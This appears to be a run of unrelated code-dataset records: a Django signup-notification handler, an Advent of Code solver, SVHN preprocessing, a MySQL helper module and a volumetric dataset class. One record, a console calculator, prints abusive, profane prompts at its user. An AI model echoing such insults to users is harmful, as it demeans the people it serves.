all modified params\n bookmark_search = BookmarkSearch(q='search query', sort=BookmarkSearch.SORT_ADDED_ASC, user='user123')\n modified_params = bookmark_search.modified_params\n self.assertCountEqual(modified_params, ['q', 'sort', 'user'])\n","sub_path":"bookmarks/tests/test_bookmark_search_model.py","file_name":"test_bookmark_search_model.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"336023697","text":"from django.core.mail import send_mail\nfrom django.dispatch import receiver\nfrom django.utils.translation import ugettext, ugettext_lazy as _\nfrom allauth.account.signals import user_signed_up\nfrom accounts.models import User\n\n\n@receiver(user_signed_up)\ndef send_mail_to_superusers_when_user_signed_up(request, user, **kwargs):\n superusers = User.objects.filter(is_superuser=True)\n site_name = request.site.name\n site_domain = request.site.domain\n subject = _(\"[{site_name}] A new user has registered an account\").format(\n site_name=site_name\n )\n message = _(\n \"\"\"Hello from {site_name}!\n\nYou're receiving this e-mail because user {username} has registered an account on {site_domain}, site on which you are referenced as a superuser.\n\n--\n{site_name}\n\"\"\"\n ).format(site_name=site_name, site_domain=site_domain, username=user.username)\n from_email = None\n for superuser in superusers:\n recipient_list = [superuser.email]\n send_mail(subject, message, from_email, recipient_list)\n","sub_path":"apps/accounts/signals/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"175809424","text":"import re\n\nfrom aoc_parser import Parser\nfrom aoc_board import Grid, Point\n\n\nPATTERN = '^position=<(.*), (.*)> velocity=<(.*), (.*)>$'\n\n\ndef main():\n file_name = 'data'\n point_velocities = get_point_velocities(file_name)\n min_time = get_min_area_time(point_velocities)\n grid = grid_at_time(point_velocities, min_time)\n # Part 1: GPJLLLLH\n print(grid)\n # Part 2: 10515\n print('Part 2: {}'.format(min_time))\n\n\ndef get_min_area_time(point_velocities):\n previous, i = None, 0\n while True:\n grid = grid_at_time(point_velocities, i)\n area = grid.area()\n if previous is not None and area > previous:\n return i - 1\n else:\n previous = area\n i += 1\n\n\ndef grid_at_time(point_velocities, i):\n grid = Grid()\n for point, velocity in point_velocities:\n grid.add(point + (i * velocity))\n return grid\n\n\ndef get_point_velocities(file_name):\n result = []\n for line in Parser(file_name).lines():\n match = re.match(PATTERN, line)\n position = Point(int(match[1]), int(match[2]))\n velocity = Point(int(match[3]), int(match[4]))\n result.append((position, velocity))\n return result\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2018/10/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"274739275","text":"\n# coding: utf-8\n\n# In[1]:\n\nget_ipython().magic(u'matplotlib inline')\nimport os\nimport matplotlib.pyplot as plt\nimport sys\nimport pickle\nfrom PIL import Image\nfrom matplotlib.pyplot import imshow\nimport cv2\nimport numpy as np\nfrom skimage.color import rgb2gray\nimport glob\nfrom collections import defaultdict\n\n\n# In[2]:\n\ntest_Struct = pickle.load(open( \"test_save.p\", \"rb\" ))\n\n\n# In[3]:\n\nStruct = pickle.load( open( \"save.p\", \"rb\" ) )\n\n\n# In[4]:\n\ndef gen_bbox(structure):\n img_file = defaultdict(list)\n\n for x in structure:\n img_file[x[0]].append(x[1:])\n \n return img_file\n\nimg_file = gen_bbox(Struct)\nimg_file\n\n\n# In[ ]:\n\n\n\n\n# In[5]:\n\ntest_img_file = gen_bbox(test_Struct)\ntest_img_file\n\n\n# In[6]:\n\nimage_size = 64\n#num_labels = 10\nnum_channels = 1 # grayscale\n\ndef reformat(dataset):\n dataset = dataset.reshape(\n (-1, image_size, image_size, num_channels)).astype(np.float32)\n return dataset\n\n\n# In[5]:\n\ndef conv_channel(img):\n new_array = np.empty(shape=(img.shape[3], img.shape[0],img.shape[1]), dtype=np.float32)\n#new_array[9].shape\n for i in range(img.shape[3]):\n img_single = img[:,:,:,i]\n img_single_gray = rgb2gray(img_single)\n new_array[i] = img_single_gray\n return new_array\n\n\n# In[16]:\n\nconv_channel(reshaped_data).shape\n\n\n# In[8]:\n\nnum_of_data = 13067\ndef gen_data(files):\n new_array = np.empty(shape=(num_of_data,64,64,1), dtype=np.float32)\n for count, i in enumerate(files.keys()[1:num_of_data]): #starting index value is 1\n img_path = os.path.join('train/{}'.format(i))#.format(i)\n img = Image.open(img_path)\n #imshow(img)\n pic = img_file[i]\n labels = [x[0] for x in pic]\n left = [x[1] for x in pic]\n top = [x[2] for x in pic]\n width = [x[3] for x in pic]\n height = [x[4] for x in pic]\n #print labels\n left_bbox = left[0] \n top_bbox = top[0]\n width_bbox = sum(width)\n height_bbox = height[0]\n box = (left_bbox, top_bbox, left_bbox+width_bbox, top_bbox+height_bbox)\n\n area = img.crop(box).resize([64,64], Image.ANTIALIAS)\n #imshow(area)\n reshaped_data = reformat(rgb2gray(np.asarray(area)))\n #print reshaped_data.shape\n new_array[count] = reshaped_data\n return new_array\n\n\nnew_array = gen_data(img_file)\nnew_array\n\n\n# In[9]:\n\ntest_new_array = gen_data(test_img_file)\n\n\n# In[10]:\n\ntest_new_array\n\n\n# In[22]:\n\ncv2.imshow('image',test_new_array[-2])\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n\n# In[12]:\n\ndef gen_labels(folder, files):\n labels_img = []\n for count, i in enumerate(files.keys()[1:num_of_data]): #starting index value is 1\n img_path = os.path.join('{}/{}'.format(folder, i))#.format(i)\n img = Image.open(img_path)\n #imshow(img)\n pic = img_file[i]\n labels = [x[0] for x in pic]\n #five_seq_labels = np.empty(shape=(1,5), dtype=np.uint8)\n five_seq_labels = []\n #print labels[0]\n for s in range(5):\n try:\n if labels[s] == 10:\n labels[s] = 0\n five_seq_labels.append(labels[s])\n #five_seq_labels[count][s] = labels[s]\n except: \n five_seq_labels.append(10)\n \n labels_img.append(five_seq_labels)\n return np.array(labels_img)\n #five_seq_labels[count][s] = 10\n #five_seq_labels = np.array(five_seq_labels).flatten()\n #five_seq_labels = (np.arange(11) == five_seq_labels[:,None]).astype(np.float32)\n #labels_img.append(five_seq_labels) \n #five_seq_labels = five_seq_labels.flatten() \n #five_seq_labels = (np.arange(11) == five_seq_labels[:,None]).astype(np.float32)\n#labels_img = gen_labels('train', img_file)\n#labels_img\n 
#labels_img.append(five_seq_labels)\n#print labels_img\n#labels_img = np.array(labels_img)\n#print labels_img.shape\n#five_seq_labels\n#five_seq_labels[0][:,None]\n\n\n# In[13]:\n\nlabels_test_img = gen_labels('test', test_img_file)\nlabels_test_img\n\n\n# In[18]:\n\ndef one_hot_en(lbls):\n labels_dataset = []\n for c in range(num_of_data-1):\n labels_dataset.append((np.arange(11) == lbls[c][:,None]).astype(np.float16))\n return labels_dataset\n\n#labels_dataset = one_hot_en(labels_img)\n#labels_dataset\n\n\n# In[19]:\n\nlabels_test_dataset = one_hot_en(labels_test_img)\nlabels_test_dataset\n\n\n# In[22]:\n\ntotal_data = pickle.dump(new_array, open(\"total_data.p\", \"wb\" ) )\n\n\n# In[23]:\n\ntotal_data = pickle.load( open( \"total_data.p\", \"rb\" ) )\n\n\n# In[24]:\n\ntotal_data.shape\n\n\n# In[15]:\n\ntotal_label = pickle.dump(np.array(labels_dataset), open(\"total_labels.p\", \"wb\" ) )\n\n\n# In[19]:\n\ntotal_labels = pickle.load( open( \"total_labels.p\", \"rb\" ) )\n\n\n# In[29]:\n\ntotal_labels[-1]\n\n\n# In[22]:\n\nSample_test_data = pickle.dump(test_new_array, open(\"sample_test_data.p\", \"wb\" ) )\n\n\n# In[23]:\n\nSample_test_data = pickle.load( open( \"sample_test_data.p\", \"rb\" ) )\nSample_test_data.shape\n\n\n# In[24]:\n\nSample_test_label = pickle.dump(np.array(labels_test_dataset), open(\"sample_test_labels.p\", \"wb\" ) )\n\n\n# In[26]:\n\nSample_test_labels = pickle.load( open( \"sample_test_labels.p\", \"rb\" ) )\nSample_test_labels\n\nlabels\n# In[14]:\n\nlabels_dataset.shape\n\n\n# In[100]:\n\nfive_seq_labels = np.empty(shape=(1,5), dtype=np.float32)\n\n\n# In[101]:\n\nfive_seq_labels[0][0] = 1\n\n\n# In[102]:\n\nfive_seq_labels = five_seq_labels.flatten()\nfive_seq_labels\n\n\n# In[103]:\n\nlabels_2 = (np.arange(10) == five_seq_labels[:,None]).astype(np.float32)\n\n\n# In[28]:\n\nls = np.array([[6, 10, 10, 10, 10], [6, 10, 10, 10, 10]])\n\n\n# In[30]:\n\nls[:,None]\n\n\n# In[32]:\n\nls[0]\n\n\n# In[20]:\n\nlabels_test_dataset[-1]\n\n\n# In[23]:\n\n#concatanate the numpy arrays\ntotal_test_data = pickle.dump(test_new_array, open(\"total_test_data.p\", \"wb\" ) )\n\n\n# In[25]:\n\ntotal_test_data = pickle.load( open( \"total_test_data.p\", \"rb\" ) )\n\n\n# In[26]:\n\ntotal_test_data.shape\n\n\n# In[27]:\n\ntotal_test_label = pickle.dump(np.array(labels_test_dataset), open(\"total_test_labels.p\", \"wb\" ) )\n\n\n# In[28]:\n\ntotal_test_labels = pickle.load( open( \"total_test_labels.p\", \"rb\" ) )\n\n\n# In[29]:\n\ntotal_test_labels.shape\n\n\n# In[ ]:\n\n\n\n","sub_path":"svhn_preprocessing-2.py","file_name":"svhn_preprocessing-2.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"51296135","text":"import time\nclass calcculator:\n\t\n\t \n\t\t\n\t\t\n\t\t\n\tdef cal():\n\t\t#try to use eval() with local scope\n\t\t\n\t\tfunt = input('what is the funtion you would like to do????????????\\n type +,-,*,/,^\\n').strip(' ')\n\t\twhile not (funt == '+' or funt == '-' or funt == '/' or funt == '*' or funt == '^'):\n\t\t\tfunt = input('you fucking idiot type a fuction\\n type +,-,*,/,^\\n').strip(' ') \n\t\t\n\t\tnum1 = input('what the hell is the first number???????????????\\n').strip(' ' + ',')\n\t\twhile num1 == '':\n\t\t\tnum1 = input('you fucking idiot type a number\\n').strip(' ' + ',')\n\t\t\n\t\tnum2 = input('what the hell is the second number???????????????\\n').strip(' '+',')\n\t\twhile num2 == '':\n\t\t\tnum2 = input('you fucking idiot type another number\\n').strip(' ' + ',')\n\t\t\n\t\tnum1= num1.strip(' ' + ',')\t\n\t\tnum2 = num2.strip(' ' + ',')\n\t\tif funt == '+':\n\t\t\tresult = int(num1) + int(num2) #to add the two numbers the user inputed \n\t\t\t\n\t\tif funt == '-':\n\t\t\tresult = int(num1) - int(num2) #to subtract the two numbers the user inputed \n\t\t\t\n\t\tif funt == '*':\n\t\t\tresult = int(num1) * int(num2) #to multiply the two numbers the user inputed \n\t\t\n\t\tif funt == '/':\n\t\t\tresult = int(num1) / int(num2) #nice #to divide the two numbers the user inputed \n\t\t\n\t\tif funt == '^':\n\t\t\tresult = int(num1) ** int(num2) #to exponetuality the two numbers the user inputed \n\t\tprint(result)\n\t\ttime.sleep(2)\n\t\tprint('do it yourself next time bitch')\n\t\t\n\t\t\n\t\t\n\tdef var():\n\t\tfunt = input('what is the fucking funtion in your eq???????????? \\n type +,-,*,/,\\n').strip(' ')\n\t\twhile not (funt == '+' or funt == '-' or funt == '/' or funt == '*' or funt == '^'):\n\t\t\tfunt = input('you fucking idiot type a fuction\\n type +,-,*,/,^\\n').strip(' ') \n\t\t\n\t\tnum1 = input('what the fuck is the first number you lazy peace of shit????????\\n').strip(' ')\n\t\twhile num1 == '':\n\t\t\tnum1 = input('you fucking idiot type a number\\n').strip(' ' + ',')\n\t\t\n\t\teq = input('what the fuck is the product of these 2 numbers???\\n').strip(' ')\n\t\twhile eq == '':\n\t\t\teq = input('you fucking idiot what is the number\\n').strip(' ' + ',')\n\t\t\n\t\tif funt == '+': #when the fuction is addishion we need to do the opposit\n\t\t\tproduct = int(eq)-int(num1) \n\n\t\tif funt == '-': #when the fuction is subtraction we need to do the opposit\n\t\t\tproduct = int(eq)+int(num1) \n\n\t\tif funt == '/': #when the fuction is divishion we need to do the opposit\n\t\t\tproduct = int(eq)*int(num1) \n\n\t\tif funt == '*': #when the fuction is muliplacation we need to do the opposit\n\t\t\tproduct = int(eq)/int(num1) \n\n\t\t\n\t\tprint('the varibul is\\n' + str(product))\n\t\ttime.sleep(2)\n\t\t#os_speak('lazy bitch')\n\n","sub_path":"class_calc_test.py","file_name":"class_calc_test.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"650044829","text":"\nfrom collections import defaultdict\n\n# on lit dans un fichier des couples (x, y)\n\ntuples = [\n (1, 2),\n (2, 1),\n (1, 3),\n (2, 4),\n]\n\n# et on veut construire un dictionnaire\n# x -> [ liste de tous les y connectés à x]\nresultat = {}\n\nfor x, y in tuples:\n if x not in resultat:\n resultat[x] = []\n resultat[x].append(y)\n\nfor key, value in resultat.items():\n print(key, value)\nprint(resultat)\n\nprint(\"**\"*20)\n# on indique que les valeurs doivent être créés à la volée\n# en utilisant la fonction list\nresultat = defaultdict(list)\n# du coup plus besoin de vérifier la présence de la clé\nfor x, y in tuples:\n resultat[x].append(y) \nfor key, value in resultat.items():\n print(key, value) \n \nprint(\"--\"*20)\ns = [('yellow', 1), ('blue', 2), ('yellow', 3), ('blue', 4), ('red', 1)]\nd = defaultdict(list)\nprint(type(s))\nfor k, v in s:\n d[k].append(v)\nprint(d.items()) \n\nprint(\"--\"*20)\ncompteurs = defaultdict(int)\nphrase = \"une phrase dans laquelle on veut compter les caractères\"\nfor c in phrase:\n compteurs[c] += 1 \nprint(sorted(compteurs.items()))\n\nprint(\"**\"*20)\nannuaire = dict([('marc', 35), ('alice', 30), ('eric', 38)])\nprint('avant', annuaire)\n# ceci sera sans effet car eric est déjà présent\nprint('set_default eric', annuaire.setdefault('eric', 50))\n# par contre ceci va insérer une entrée dans le dictionnaire\nprint('set_default inconnu', annuaire.setdefault('inconnu', 50))\n# comme on le voit \nprint('après', annuaire)\n\n \n","sub_path":"S3/dico3.py","file_name":"dico3.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"459987273","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'ghost'\n\nimport time, uuid, functools, threading, logging\n\ndef next_id(t=None):\n \"\"\"\n \"\"\"\n if t is None:\n t = time.time()\n return '%015d%s000' % (int(t * 1000), uuid.uuid4().hex)\n\ndef _profiling(start, sql=''):\n t = time.time() - start\n if t > 0.1:\n logging.warning('[PROFILING] [DB] %s: %s' % (t, sql))\n else:\n logging.info('[PROFILING] [DB] %s: %s' % (t, sql))\n\nclass DBError(Exception):\n \"\"\"\n 数据异常类\n \"\"\"\n pass\n\nclass MultiColumnsError(DBError):\n \"\"\"\n \"\"\"\n pass\n\nclass Dict(dict):\n \"\"\"\n 增强型字典,继承原有的字典,可以将两个列表打包成字典,实现 dict(zip(list1, list2))\n >>> d1 = Dict()\n >>> type(d1)\n \n >>> d1['name'] = 'python'\n >>> d1.name\n 'python'\n >>> d1['age'] = 13\n >>> d1['age']\n 13\n >>> d1.get('name')\n 'python'\n >>> d1.get('lll', 0)\n 0\n >>> d2 = Dict(name='python', age=13)\n >>> d2['name']\n 'python'\n >>> d2['none']\n Traceback (most recent call last):\n ...\n KeyError: 'none'\n >>> d2.name\n 'python'\n >>> d2.none\n\n Traceback (most recent call last):\n ...\n AttributeError: 'Dict' object has no attribute 'none'\n >>> d3 = Dict(('name', 'age'), ('python', 13), isgood=True)\n >>> d3\n {'isgood': True, 'age': 13, 'name': 'python'}\n \"\"\"\n def __init__(self, names=(), values=(), **kwargs):\n super(Dict, self).__init__(**kwargs)\n self.update(dict(zip(names, values)))\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n raise AttributeError(r\"'Dict' object has no attribute '%s'\" % key)\n\n def __setattr__(self, key, value):\n self[key] = value\n\nclass _LasyConnection(object):\n \"\"\"\n 获取数据库引擎`连接资源句柄connection`\n 通过connection获取cursor\n 操作 commit, rollback\n 关闭连接 cleanup\n \"\"\"\n def __init__(self):\n self.connection = None\n\n def cursor(self):\n if self.connection is None:\n connection = engine.connect()\n logging.info('open connection <%s>...' % hex(id(connection)))\n self.connection = connection\n return self.connection.cursor()\n\n def commit(self):\n self.connection.commit()\n\n def rollback(self):\n self.connection.rollback()\n\n def cleanup(self):\n if self.connection:\n connection = self.connection\n self.connection = None\n logging.info('close connection <%s>...' 
% hex(id(connection)))\n connection.close()\n\nclass _DbCtx(threading.local):\n \"\"\"\n 数据库上下文操作类,实例全局数据库上下文实例 `_db_Ctx`\n 主要提供给 `_ConnectionCtx` 进行判断 connection 是否初始化`is_init`,进行初始化`init`和关闭`cleanup`\n \"\"\"\n def __init__(self):\n self.connection = None\n self.transactions = 0\n\n def is_init(self):\n return not self.connection is None\n\n def init(self):\n logging.info('open lazy connections...')\n self.connection = _LasyConnection()\n self.transactions = 0\n\n def cleanup(self):\n self.connection.cleanup()\n self.connection = None\n\n def cursor(self):\n return self.connection.cursor()\n\nclass _Engine(object):\n \"\"\"\n 数据库引擎类,用于连接数据库\n \"\"\"\n def __init__(self, connect):\n self._connect = connect\n\n def connect(self):\n return self._connect()\n\n# 数据库上下文操作连接\n_db_ctx = _DbCtx()\n\n# 全局数据库引擎对象\nengine = None\n\ndef create_engine(user, passwd, db, host='127.0.0.1', port=3306, **kwargs):\n \"\"\"\n 创建数据库引擎,实现全局对象 `engine`\n \"\"\"\n import MySQLdb\n global engine\n if engine is not None:\n raise DBError('Engine is already initialized.')\n # 连接参数\n params = dict(user=user, passwd=passwd, db=db, host=host, port=port)\n # 默认的连接参数\n defaults = dict(use_unicode=True, charset='utf8')\n for k, v in defaults.iteritems():\n params[k] = kwargs.pop(k, v)\n # 通过函数参数更新连接参数\n params.update(kwargs)\n # 创建engine全局对象\n engine = _Engine(lambda: MySQLdb.connect(**params))\n logging.info('Init mysql engine <%s> ok.' % hex(id(engine)))\n\nclass _ConnectionCtx(object):\n \"\"\"\n 打开关闭数据库上下文类,用于进行数据库操作时候,获取数据库引擎连接`connection`,操作结束后关闭连接\n with _ConnectionCtx():\n pass\n \"\"\"\n def __enter__(self):\n global _db_ctx\n self.should_cleanup = False\n if not _db_ctx.is_init():\n _db_ctx.init()\n self.should_cleanup = True\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n global _db_ctx\n if self.should_cleanup:\n _db_ctx.cleanup()\n\ndef connection():\n \"\"\"\n 对`_ConnectionCtx`的封装, 提供对外接口\n with connection():\n do_some_db_operation()\n \"\"\"\n return _ConnectionCtx()\n\ndef with_connection(func):\n \"\"\"\n 获取数据库连接和关闭装饰器\n @with_connection\n def foo(*args, **kwargs):\n do_some_db_operation()\n do_some_db_operation()\n \"\"\"\n @functools.wraps(func)\n def _wrapper(*args, **kwargs):\n with _ConnectionCtx():\n return func(*args, **kwargs)\n return _wrapper\n\nclass _TransactionCtx(object):\n\n def __enter__(self):\n global _db_ctx\n self.should_close_conn = False\n if not _db_ctx.is_init():\n _db_ctx.init()\n self.should_close_conn = True\n _db_ctx.transactions += 1\n logging.info('begin transaction...' if _db_ctx.transactions==1 else 'join current transaction...')\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n global _db_ctx\n _db_ctx.transactions -= 1\n try:\n if _db_ctx.transactions == 0:\n if exc_type is None:\n self.commit()\n else:\n self.rollback()\n finally:\n if self.should_close_conn:\n _db_ctx.cleanup()\n\n def commit(self):\n global _db_ctx\n logging.info('commit transaction...')\n try:\n _db_ctx.connection.commit()\n logging.info('commit ok.')\n except:\n logging.warning('commit failed. 
try rollback...')\n _db_ctx.connection.rollback()\n logging.warning('rollback ok.')\n raise\n\n def rollback(self):\n global _db_ctx\n logging.warning('rollback transaction...')\n _db_ctx.connection.rollback()\n logging.info('rollback ok.')\n\ndef transaction():\n \"\"\"\n >>> test(True)\n\n Traceback (most recent call last):\n ...\n StandardError: will cause rollback...\n\n >>> test(False)\n >>> user = select_one(\"SELECT * FROM user WHERE passwd=?\", 'test')\n >>> user\n {'passwd': u'test', 'last_modified': None, 'nickname': u'chage', 'id': 4L, 'email': u'test@gmail.com'}\n \"\"\"\n\n return _TransactionCtx()\n\ndef with_tarnsaction(func):\n\n @functools.wraps(func)\n def _wrapper(*args, **kwargs):\n _start = time.time()\n with _TransactionCtx():\n return func(*args, **kwargs)\n _profiling(_start)\n return _wrapper\n\n@with_connection\ndef _select(sql, first, *args):\n \"\"\"\n 查询函数\n \"\"\"\n global _db_ctx\n cursor = None\n sql = sql.replace('?', '%s')\n logging.info('SQL: %s, ARFS: %s' % (sql, args))\n try:\n # 通过数据库上下文获取查询游标`cursor`\n cursor = _db_ctx.connection.cursor()\n # 执行sql查询\n cursor.execute(sql, args)\n # 处理查询结果,返回 对象列表\n if cursor.description:\n names = [x[0] for x in cursor.description]\n if first:\n values = cursor.fetchone()\n if not values:\n return None\n return Dict(names, values)\n return [Dict(names, x) for x in cursor.fetchall()]\n finally:\n # 关闭游标\n if cursor:\n cursor.close()\n\n@with_connection\ndef _update(sql, *args):\n global _db_ctx\n cursor = None\n sql = sql.replace('?', '%s')\n logging.info('SQL: %s, ARGS: %s' % (sql, args))\n try:\n cursor = _db_ctx.connection.cursor()\n cursor.execute(sql, args)\n r = cursor.rowcount\n if _db_ctx.transactions == 0:\n logging.info('auto commit')\n _db_ctx.connection.commit()\n return r\n finally:\n if cursor:\n cursor.close()\n\ndef update(sql, *args):\n return _update(sql, *args)\n\ndef insert(table, **kwargs):\n \"\"\"\n >>> insert('user', nickname='python', email='python@gmail.com', passwd='123456', last_modified=time.time())\n 1L\n >>> u2 = Dict(('nickname', 'email', 'passwd', 'last_modified'), ('ruby', 'ruby@gmail.com', '111111', time.time()))\n >>> u2\n {'passwd': '111111', 'last_modified': 1402976947.139, 'nickname': 'ruby', 'email': 'ruby@gmail.com'}\n >>> insert('user', **u2)\n 1L\n >>>\n \"\"\"\n cols, args = zip(*kwargs.iteritems())\n sql = 'insert into `%s` (%s) values (%s)' % (table, ','.join(['`%s`' % col for col in cols]), ','.join(['?' 
for i in range(len(cols))]))\n return _update(sql, *args)\n\ndef delete(sql, *args):\n return _update(sql, *args)\n\ndef select_int(sql, *args):\n d = _select(sql, True, *args)\n if len(d) != 1:\n raise MultiColumnsError('Expect only one column.')\n return d.values()[0]\n\ndef select(sql, *args):\n \"\"\"\n >>> users = select(\"SELECT * FROM user\")\n >>> users\n [{'passwd': u'123456', 'last_modified': 1402976784.347, 'nickname': u'python', 'id': 1L, 'email': u'python@gmail.com'}, {'passwd': u'111111', 'last_modified': 1402976947.139, 'nickname': u'ruby', 'id': 2L, 'email': u'ruby@gmail.com'}]\n >>> users = select(\"SELECT * FROM user WHERE id=?\", 2)\n >>> users\n [{'passwd': u'111111', 'last_modified': 1402976947.139, 'nickname': u'ruby', 'id': 2L, 'email': u'ruby@gmail.com'}]\n >>> users = select(\"SELECT * FROM user ORDER BY last_modified ASC\")\n >>> users\n [{'passwd': u'123456', 'last_modified': 1402976784.347, 'nickname': u'python', 'id': 1L, 'email': u'python@gmail.com'}, {'passwd': u'111111', 'last_modified': 1402976947.139, 'nickname': u'ruby', 'id': 2L, 'email': u'ruby@gmail.com'}]\n >>>\n >>> users = select(\"SELECT * FROM user WHERE id=?\", 1000)\n >>> users\n []\n \"\"\"\n return _select(sql, False, *args)\n\ndef select_one(sql, *args):\n \"\"\"\n >>> u = select_one(\"SELECT * FROM user WHERE id=?\", 2)\n >>> u\n {'passwd': u'111111', 'last_modified': 1402976947.139, 'nickname': u'ruby', 'id': 2L, 'email': u'ruby@gmail.com'}\n \"\"\"\n return _select(sql, True, *args)\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n create_engine(user='root', passwd='', db='webapp')\n # update(\"DROP TABLE IF EXISTS user\")\n # update(\"CREATE TABLE user (id INT UNSIGNED NOT NULL PRIMARY KEY AUTO_INCREMENT, nickname VARCHAR(40), email VARCHAR(40), passwd VARCHAR(40), last_modified REAL)\")\n def test(rollback):\n with transaction():\n u = dict(nickname='test', email='test@gmail.com', passwd='test')\n insert('user', **u)\n r = update(\"UPDATE user SET nickname='chage' WHERE passwd='test'\")\n if rollback:\n raise StandardError('will cause rollback...')\n import doctest\n doctest.testmod()\n\n\n\n\n","sub_path":"www/transwarp/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":11626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"533861587","text":"from __future__ import print_function\nfrom collections import OrderedDict\nimport copy\nimport numpy as np\n\nfrom .box import Box\nfrom .sequence import SampleSequence\nfrom .tensor import TensorData\nfrom .vector import Vec3d\n\n\nclass Dataset(object):\n \"\"\"\n Dataset interface.\n \"\"\"\n\n def next_sample(self):\n raise NotImplementedError\n\n def random_sample(self):\n raise NotImplementedError\n\n\nclass OutOfRangeError(Exception):\n def __init__(self):\n super(OutOfRangeError, self).__init__()\n\n\nclass VolumeDataset(Dataset):\n \"\"\"\n Dataset for volumetric data.\n\n Attributes:\n _params: Dataset-specific parameters.\n _data: Dictionary mapping key to TensorData, each of which contains\n 4D volumetric data. (e.g. EM image stacks, segmentation, etc.)\n _spec: Sample specification. Dictionary mapping key to dimension,\n which can be either a list or tuple with at least 3 elements.\n _range: Range of valid coordinates for accessing data given the sample\n spec. It depends both on the data and sample spec.\n _sequence:\n _locs: Valid locations.\n \"\"\"\n\n def __init__(self, **kwargs):\n # Initialize attributes.\n self._reset()\n # Set dataset-specific params.\n for k, v in kwargs.items():\n self._params[k] = v\n\n def add_raw_data(self, key, data, fov=(0,0,0), offset=(0,0,0)):\n \"\"\"Add a raw volume to the dataset.\"\"\"\n self.add_data(key, TensorData(data,fov,offset))\n\n def add_data(self, key, data):\n \"\"\"Add data to the dataset.\"\"\"\n assert isinstance(data, TensorData)\n self._data[key] = data\n\n def add_raw_mask(self, key, data, loc=False, **kwargs):\n self.add_raw_data(key, data, **kwargs)\n if loc:\n self._add_location(self._data[key])\n\n def add_mask(self, key, data, loc=False):\n self.add_data(key, data)\n if loc:\n self._add_location(self._data[key])\n\n def set_sequence(self, seq):\n \"\"\"Add sample sequence generator.\"\"\"\n assert isinstance(seq, SampleSequence)\n self._sequence = seq\n\n def get_sample(self, pos):\n \"\"\"Extract a sample centered on pos.\n\n Every data in the sample is guaranteed to be center-aligned.\n\n Args:\n pos: Center coordinates of the sample.\n\n Returns:\n Sample, a dictionary mapping key to data.\n \"\"\"\n sample = OrderedDict()\n for key in self._spec.keys():\n if key in self._data:\n patch = self._data[key].get_patch(pos)\n if patch is None:\n raise OutOfRangeError()\n else:\n sample[key] = patch\n return sample\n\n def next_sample(self, spec=None):\n \"\"\"Fetch the next sample in a predefined sequence, if any.\"\"\"\n if self._sequence is None:\n ret = self.random_sample(spec=spec)\n else:\n assert self.has_spec()\n original_spec = self.get_spec()\n try:\n # Dynamically change spec.\n if spec is not None: self.set_spec(spec)\n # Pick a random sample.\n pos = self._sequence()\n ret = self.get_sample(pos)\n # Revert to the original sample spec.\n if spec is not None: self.set_spec(original_spec)\n except:\n self.set_spec(original_spec)\n raise OutOfRangeError()\n return ret\n\n def random_sample(self, spec=None):\n \"\"\"Fetch a sample randomly.\"\"\"\n assert self.has_spec()\n original_spec = self.get_spec()\n try:\n # Dynamically change spec.\n if spec is not None: self.set_spec(spec)\n # Pick a random sample.\n pos = self._random_location()\n ret = self.get_sample(pos)\n # Revert to the original sample spec.\n if spec is not None: self.set_spec(original_spec)\n except:\n self.set_spec(original_spec)\n raise OutOfRangeError()\n return ret\n\n 
####################################################################\n ## Getters and setters.\n ####################################################################\n\n def get_spec(self):\n \"\"\"Return sample spec.\"\"\"\n return copy.deepcopy(self._spec)\n\n def set_spec(self, spec):\n \"\"\"Set smaple spec and update the valid range of data samples.\"\"\"\n # Order by key.\n self._spec = OrderedDict(sorted(spec.items(), key=lambda x: x[0]))\n self._update_range()\n\n def has_spec(self):\n return self._spec is not None\n\n def get_param(self, key):\n assert key in self._params\n return self._params[key]\n\n def set_param(self, key, value):\n self._params[key] = value\n\n def get_params(self):\n return copy.deepcopy(self._params)\n\n def num_sample(self):\n \"\"\"Return the number of samples.\"\"\"\n n = 0\n if self._sequence is None:\n s = self._range.size()\n n = s[0]*s[1]*s[2]\n else:\n if self._locs is None:\n n = self._sequence.get_length()\n else:\n n = len(self._locs[0])\n return n\n\n def get_range(self):\n \"\"\"Return the valid range box.\"\"\"\n return Box(self._range)\n\n ####################################################################\n ## Private Helper Methods.\n ####################################################################\n\n def _reset(self):\n \"\"\"Reset all attributes.\"\"\"\n self._params = dict()\n self._data = dict()\n self._spec = None\n self._range = None\n self._sequence = None\n # Valid locations (optional).\n self._locs = None\n self._offset = None\n\n def _add_location(self, data):\n assert isinstance(data, TensorData)\n self._locs = data.get_data().nonzero()[-3:]\n self._offset = data.offset()\n\n def _random_location(self):\n \"\"\"Return one of the valid locations randomly.\"\"\"\n if self._locs is None:\n s = self._range.size()\n z = np.random.randint(0, s[0])\n y = np.random.randint(0, s[1])\n x = np.random.randint(0, s[2])\n # Global coordinate system.\n loc = Vec3d(z,y,x) + self._range.min()\n # DEBUG(kisuk)\n # print('loc = {}'.format(loc))\n else:\n while True:\n idx = np.random.randint(0, self._locs[0].size)\n loc = tuple([x[idx] for x in self._locs])\n # Global coordinate system.\n loc = Vec3d(loc) + self._offset\n if self._range.contains(loc):\n break\n return loc\n\n def _update_range(self):\n \"\"\"Update the valid range.\n\n Compute the intersection of the valid range 